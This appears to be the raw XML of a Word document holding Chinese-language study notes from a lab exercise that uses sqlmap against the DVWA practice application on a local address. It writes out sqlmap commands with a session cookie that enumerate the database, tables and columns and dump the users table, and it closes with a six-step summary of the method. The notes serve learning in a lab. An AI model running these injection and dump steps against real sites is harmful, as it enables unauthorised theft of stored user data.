          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D73D2C" wp14:editId="53FF5CA7">
            <wp:extent cx="5274310" cy="184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84162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AE06" w14:textId="0B3FBBE2" w:rsidR="004802F9" w:rsidRPr="005445B8" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://192.168.0.103/DVWA-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie "PHPSESSID=95g007aill2ifhaet6e2i9j4g</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>0;security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">=low" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables -T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B34738" w14:textId="1289A725" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D"/>
    <w:p w14:paraId="45DDE2F3" w14:textId="27178DEB" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="303A4256" wp14:editId="611B01D4">
            <wp:extent cx="5274310" cy="18846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845F5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286B" w14:textId="043F391F" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:t>最后利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--dump </w:t>
      </w:r>
      <w:r>
        <w:t>获取表中的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087EFF48" w14:textId="142D34FC" w:rsidR="004802F9" w:rsidRPr="005445B8" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://192.168.0.103/DVWA-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie "PHPSESSID=95g007aill2ifhaet6e2i9j4g</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>0;security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">=low" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables -T users --columns –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9975A" w14:textId="4B1C52B2" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31CC715C" wp14:editId="053E890C">
            <wp:extent cx="5274310" cy="17360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842DB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5F7E" w14:textId="1A6F30D1" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D"/>
    <w:p w14:paraId="576517BA" w14:textId="38B8B7F2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">个人总结  1：得到注入的漏洞  </w:t>
      </w:r>
      <w:proofErr w:type="spell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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7058738D" w14:textId="3846AC37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2： 如果有用户名密码登陆的网站要获取到登陆的cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7F92C" w14:textId="273A7900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3： 利用  -u 指定</w:t>
      </w:r>
      <w:proofErr w:type="spell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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> ，-</w:t>
      </w:r>
      <w:proofErr w:type="spell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cooike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 指定</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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cookie --</w:t>
      </w:r>
      <w:proofErr w:type="spell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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">  获取数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E58835" w14:textId="0940C135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 xml:space="preserve">4： -D指定数据库   --table </w:t>
      </w:r>
      <w:proofErr w:type="gram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来猜解我们</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEF2866" w14:textId="1440B751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 xml:space="preserve">5： -T 指定表名  --columns  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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猜解表中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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有哪些 字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED8210" w14:textId="31230318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</w:pPr>
      <w:r w:rsidRPr="005445B8"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  <w:t>6：最后利用--dump 获取表中的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA34B59" w14:textId="77777777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/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B07DB8" w14:textId="77777777" w:rsidR="004802F9" w:rsidRPr="005445B8" w:rsidRDefault="004802F9" w:rsidP="005445B8">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004802F9" w:rsidRPr="005445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400253"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B60A7F0"/>
    <w:lvl w:ilvl="0" w:tplc="899CB3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56A5F"/>
    <w:rsid w:val="00256A5F"/>
    <w:rsid w:val="004802F9"/>
    <w:rsid w:val="005445B8"/>
    <w:rsid w:val="00702F0D"/>
    <w:rsid w:val="007B36E7"/>
    <w:rsid w:val="00A4158D"/>
    <w:rsid w:val="00C21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FEE50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{10145151-BFD0-4CFB-A714-7826D11C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B36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B36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B36E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7B36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7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4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6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2018-09-08T14:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-08T15:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>